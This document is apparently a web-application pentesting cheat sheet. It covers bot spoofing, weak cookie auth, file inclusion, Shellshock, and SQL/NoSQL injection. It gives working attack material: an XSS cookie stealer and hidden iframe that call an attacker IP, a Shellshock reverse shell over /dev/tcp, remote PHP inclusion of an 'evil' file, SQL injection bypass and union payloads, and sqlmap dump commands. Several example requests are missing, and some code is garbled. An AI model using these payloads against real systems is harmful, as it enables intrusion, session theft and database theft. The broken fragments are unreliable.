There are many different ways a web application can be exploited. This will list a few simple examples, resources and tools.

Browser add-ons:


  • curl
  • wget


Bot Spoofing

Googlebot spoofing to a robots.txt page:

curl -A "Googlebot/2.1 (+" http://<host>/robots.txt

Authentication Spoofing

Simple Cookies

Some older websites may have weak authentication cookies such as using a conversion of:


Then encoding with base64 resulting in a valid header request of:

auth: dXNlcjphZG1pbgo=

To create encoded string:

echo 'user:admin' | base64 -

To create decoded string:

echo 'dXNlcjphZG1pbgo=' | base64 -d -


Some websites may be vulnerable to padding attacks. Kali has padbuster built in:

padbuster [url] [encrypt] [blocksize] [options]






Create event listener on attacker machine:

nc -lvp <port>

Reverse Connection

<iframe src="http://<attackeripaddress>:<port>/madeup.php" height="0" width="0"></iframe>

Cookie Stealer

new Image().src="http://<attackeripaddress>:<port>/madeup.php?output="+document.cookie;</script>

Cookies can then be spoofed using browser plugin or Burp Proxy.





Local File Inclusion


Server Side Code, without validation:

$file = $_GET['file'] 
if (isset($file)) {
    include( $file );


Client side request:


This request will include a file myfile.txt to load.



This request will expose the server’s local file.

Filter Avoidance

Some code may filter out /.\'" or more characters.


Directory Traversal


Remote Code Execution

Server Side Code, without validation:

$page = $_GET['page'] 
if (isset($page)) {
    include( $page . '.php');


Client side request:


This request will include a local relative file mypage.php to load.


On the attacking machine start a web server:

python -m SimpleHTTPServer <port>

Create a malicious php page:

echo '<?php shell_exec("ifconfig"); ?>' > evil.txt

Make the request:



Shellshock is a bug that was discovered in the bash shell that allows for Remote Code Execution. It is most commonly vulnerable in PHP and CGI scripts if they involve system environment variables.


Test by seeing if an echoed test string returns from a request:

curl -H "User-Agent: () { :;}; echo 'test';" http://<host>/<page>

If successful, then setup a listener shell on the attacking machine:

nc -lvp <port>

Then send the attack code:

curl -H "User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/<attackingipaddress>/<port> 0>&1;" http://<host>/<page>





SQL/NoSQL Injection

There are many popular types of SQL languages that differ in syntax but their principals are the same:

  • MySQL
  • Oracle DB
  • Microsoft SQL
  • PostreSQL
  • MongoDB

In-Band SQLi

The most common type, often considered the default type of SQL injection attacks.

Authentication Bypass

Server Side Example Code, without validation:

$user = $_POST['user'];
$password = $_POST['password'];
$query="select * from users where name = '$user' and password = '$password' ";
if (mysql_num_rows($queryN) == 1)
// load successful data/page

MySQL Table Example Table:

mysql> select * from users;

| id | name   | password |
| 1  | admin  | 123456   |
1 rows in set (0.00 sec)

Intended Results

On a login with username and password fields, a successful query would look something like this:

mysql> select * from users where name='admin' and password='123456';
| id   | name | password |
|  1  | admin | 123456   |
1 row in set (0.00 sec)

And a failed login query would result in no rows returned:

mysql> select * from users where name='admin' and password='1234';
Empty set (0.00 sec)


The query returned needs to be 1. This can be exploited by sending a true response such as 1=1 will always be true and adding a LIMIT of 1.

mysql> select count(*) from users where name=admin' 
or 1=1 LIMIT 1;# and password='1234';

The application field could look like:

admin' or 1=1 LIMIT 1;# 

This also comments out the password check.

Error Based SQLi

This type of attack can be used to help enumerate server information by receiving error codes from bad requests.

An application with a field could allow a simple test:

'; test

Which may result in an error message back:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1.

Union Based SQLi

This is often used after enumeration error based messages. A union in an SQL statement allows for two or more SELECT statements to be returned so long as they have the same data types, same order and rows. A union all will keep duplicate values.

SQL Code Example:

SELECT City FROM Customers
SELECT City FROM Vendors

Server Side Code Example:

$id = $_GET['id'];
$q = "SELECT * FROM $tbl_name where id = ".$id;

Client Request Example:



If we try adding order by 1 to the URL and keep incrementing the id= field, once we end up with an error.

http://<host>/page.php?id=2 order by 1

Say after ?id=4 it does not exist, then it can be assumed there is only ids 1, 2, and 3.

http://<host>/page.php?id=1 union select 1,2,3,4

This can setup a payload:

http://<host>/page.php?id=1 union all select 1,2,3,4
http://<host>/page.php?id=3 union select 1,2,version(),4
http://<host>/page.php?id=3 union select 1,2,@@version,4




Automated Scripts


Crawl a page:

sqlmap -u http://<host> --crawl=1

If injection is found:

sqlmap -u http://<host>/page.php?id=738 --dbms=mysql --dump --


Downlaod NoSQLMap:

git clone

Go into directory and download per-requisites:

cd NoSQLMap/
pip install couchdb pbkdf2 ipcalc 



All Methods

Using OWASP ZAP, once proxy has been setup and application has been scanned or spidered, use Attack mode. Results will end up in Alerts tab with payloads and requests.

Exposed Paths

Look for directories such as:

  • /robots.txt
  • /admin
  • /admin.php etc
  • /login
  • /login.php etc
  • /
  • /test/
  • /test.php etc
  • /uploads